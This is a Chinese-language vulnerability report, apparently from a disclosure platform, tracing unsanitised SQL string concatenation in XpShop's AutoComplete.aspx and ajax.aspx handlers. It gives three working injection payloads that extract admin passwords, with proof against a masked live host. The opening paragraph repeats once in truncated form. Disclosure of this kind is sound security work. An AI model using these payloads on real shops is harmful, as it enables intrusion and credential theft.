### 简要描述: 这是第二发 ### 详细说明: 漏洞位置:XpShop.WebUI.AutoComplete ``` protected void Page_Load(object sender, EventArgs e) { string input = this.GetInput(); if (input == "") { base.Response.Write(Utils.ShowMsg("非法调用!")); } else { base.Response.Write(this.GetProductName(input)); base.Response.End(); } } ``` 跟进这个函数GetProductName: ``` private string GetProductName(string pname) { ProductDB productDB = new ProductDB(); return productDB.GetProductNameByAjax(pname); } ``` 继续跟进GetProductNameByAjax: ``` public string GetProductNameByAjax(string productName) { string commandText = "SELECT Top 15 ProductName FROM Product WHERE ProductName Like '%" + productName + "%' ORDER BY Sort DESC"; DataSet dataSet = XpShopDB.ExecuteDataset(XpShopDB.ConnectionString, CommandType.Text, commandText, null); return dataSet.GetXml(); } ``` 进库也是没过滤的,搜索型注入。 payload: post: pname=test%' union select password from admin-- 漏洞地址: namespace XpShop.WebUI.AJAX 代码: ``` private void BindActive() { if...
### 简要描述: 这是第二发 ### 详细说明: 漏洞位置:XpShop.WebUI.AutoComplete ``` protected void Page_Load(object sender, EventArgs e) { string input = this.GetInput(); if (input == "") { base.Response.Write(Utils.ShowMsg("非法调用!")); } else { base.Response.Write(this.GetProductName(input)); base.Response.End(); } } ``` 跟进这个函数GetProductName: ``` private string GetProductName(string pname) { ProductDB productDB = new ProductDB(); return productDB.GetProductNameByAjax(pname); } ``` 继续跟进GetProductNameByAjax: ``` public string GetProductNameByAjax(string productName) { string commandText = "SELECT Top 15 ProductName FROM Product WHERE ProductName Like '%" + productName + "%' ORDER BY Sort DESC"; DataSet dataSet = XpShopDB.ExecuteDataset(XpShopDB.ConnectionString, CommandType.Text, commandText, null); return dataSet.GetXml(); } ``` 进库也是没过滤的,搜索型注入。 payload: post: pname=test%' union select password from admin-- 漏洞地址: namespace XpShop.WebUI.AJAX 代码: ``` private void BindActive() { if (base.Request.QueryString["parent_id"] != null) { this.BindChild(int.Parse(base.Request.QueryString["parent_id"])); } if (base.Request.QueryString["action"] != null && base.Request.QueryString["action"].ToString() == "del") { this.DeleteInstall(); } if (base.Request.QueryString["type"] != null) { string text = base.Request.QueryString["type"]; if (text != null) { if (<PrivateImplementationDetails>{1D6FAB71-A022-4740-999F-97750306A650}.$$method0x6000444-1 == null) { <PrivateImplementationDetails>{1D6FAB71-A022-4740-999F-97750306A650}.$$method0x6000444-1 = new Dictionary<string, int>(32) { { "GetResourceString", 0 }, { "GetShippings", 1 }, { "GetAddress", 2 }, { "GetAreaIDByName", 3 }, { "GetShippingName", 4 }, { "GetMemmberMaxAddressCount", 5 }, { "GetProductStatus", 6 }, { "GetPreNextProductID", 7 }, { "GetIsShopStop", 8 }, { "GetMemberFavCat", 9 }, { "AddToFav", 10 }, { "UserLoginStatus", 11 }, { "GetProductStatusByID", 12 }, { "AddStockReg", 13 }, { "CheckCoupons", 14 }, { "AddShoppingCartCoupons", 15 }, { "BindCoupons", 16 }, { "GetNowPrice", 17 }, { "DeleteFavPdt", 18 }, { "UpdatePayment", 19 }, { "AddNewFavCat", 20 }, { "EditFavCat", 21 }, { "DelFavCat", 22 }, { "GetCurrentMemberID", 23 }, { "GetCombineOrders", 24 }, { "GetSubArea", 25 }, { "GetStorage", 26 }, { "UpdateCartNum", 27 }, { "GetReceiveAddress", 28 }, { "ConfirmReceived", 29 }, { "ChangeScore", 30 }, { "CheckGiftStatus", 31 } }; } int num; if (<PrivateImplementationDetails>{1D6FAB71-A022-4740-999F-97750306A650}.$$method0x6000444-1.TryGetValue(text, out num)) { switch (num) { case 0: base.Response.Write(base.GetResourceString(base.Request.QueryString["str"])); base.Response.End(); goto IL_7CF; case 1: { string s = this.GetShippings(int.Parse(base.Request.QueryString["areaID"])); base.Response.Write(s); base.Response.End(); goto IL_7CF; } case 2: this.GetAddress(int.Parse(base.Request.QueryString["said"])); goto IL_7CF; case 3: this.GetAreaIDByName(base.Request.QueryString["AreaName"]);//第一处 goto IL_7CF; case 4: this.GetShippingName(base.Request.QueryString["ShippingID"]); goto IL_7CF; case 5: this.GetMemmberMaxAddressCount(); goto IL_7CF; case 6: this.GetProductStatus();//第二处 ``` 跟进第一处函数GetAreaIDByName: ``` private void GetAreaIDByName(string areaName) { base.Response.Write(new ShippingAreaDB().GetAreaIDByName(areaName)); base.Response.End(); } ``` 继续跟进函数GetAreaIDByName: ``` public string GetAreaIDByName(string areaName) { string result = "0"; string cmdText = "SELECT ShippingAreaID FROM ShippingArea WHERE [Name] = '" + areaName + "'";//进库 object obj = XpShopDB.ExecuteScalar(XpShopDB.ConnectionString, CommandType.Text, cmdText, null); if (obj != null) { result = obj.ToString(); } else { cmdText = "SELECT ShippingAreaID FROM ShippingArea WHERE [Name] LIKE '%" + areaName + "%'";//进库 object obj2 = XpShopDB.ExecuteScalar(XpShopDB.ConnectionString, CommandType.Text, cmdText, null); if (obj2 != null) { result = obj2.ToString(); } } return result; } ``` 这两处都是进库,而且都是没有过滤的。 再来看看第二个函数GetProductStatus: ``` private void GetProductStatus() { string text = ""; string text2 = base.Request.QueryString["ProductNos"]; string[] array = text2.Split(new char[] { ',' }); ProductDB productDB = new ProductDB(); ConfigDetails systemConfig = new ConfigDB().GetSystemConfig(); for (int i = 0; i < array.Length; i++) { array[i] = array[i].Trim(); SqlDataReader productStatusByNo = productDB.GetProductStatusByNo(array[i]); ``` 继续跟进函数GetProductStatusByNo: ``` public SqlDataReader GetProductStatusByNo(string productNo) { string cmdText = string.Concat(new string[] { "SELECT Status,", Utils.dbo, "f_getstorage(productid) As Storage,IsForSale FROM Product WHERE ProductNo = '", productNo, "'" }); return XpShopDB.ExecuteReader(XpShopDB.ConnectionString, CommandType.Text, cmdText, null); } ``` 这里也是没有过滤的,但是有个问题: string[] array = text2.Split(new char[] { ',' }); 这里把传过来的值作,分割了,而且所使用的表select了三个字段,所以就没有办法用union注入了(反正我是没办法,大牛们就不知道了)然后遍历进库: SqlDataReader productStatusByNo = productDB.GetProductStatusByNo(array[i]); 于是我换了一个办法,就不用,了 给出两个payload: http://localhost/ajax.aspx?type=GetAreaIDByName&AreaName=test' union select password from admin-- http://localhost/ajax.aspx?type=GetProductStatus&ProductNos=test' and 1=(select top 1 password from admin)-- ### 漏洞证明: http://**.**.**.**//AutoComplete.aspx pname=test%' union select password from admin-- [<img src="https://images.seebug.org/upload/201510/14172227397078b7f5dc910490bad264b3e461b8.jpg" alt="3.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/14172227397078b7f5dc910490bad264b3e461b8.jpg) http://localhost/ajax.aspx?type=GetAreaIDByName&AreaName=test' union select password from admin-- [<img src="https://images.seebug.org/upload/201510/1416542256c81abde5caf88dbd768e812f76786f.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/1416542256c81abde5caf88dbd768e812f76786f.jpg) http://localhost/ajax.aspx?type=GetProductStatus&ProductNos=test' and 1=(select top 1 password from admin)-- [<img src="https://images.seebug.org/upload/201510/141654401fde1909f6fcb6b5461242d4ee1acef5.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/141654401fde1909f6fcb6b5461242d4ee1acef5.jpg)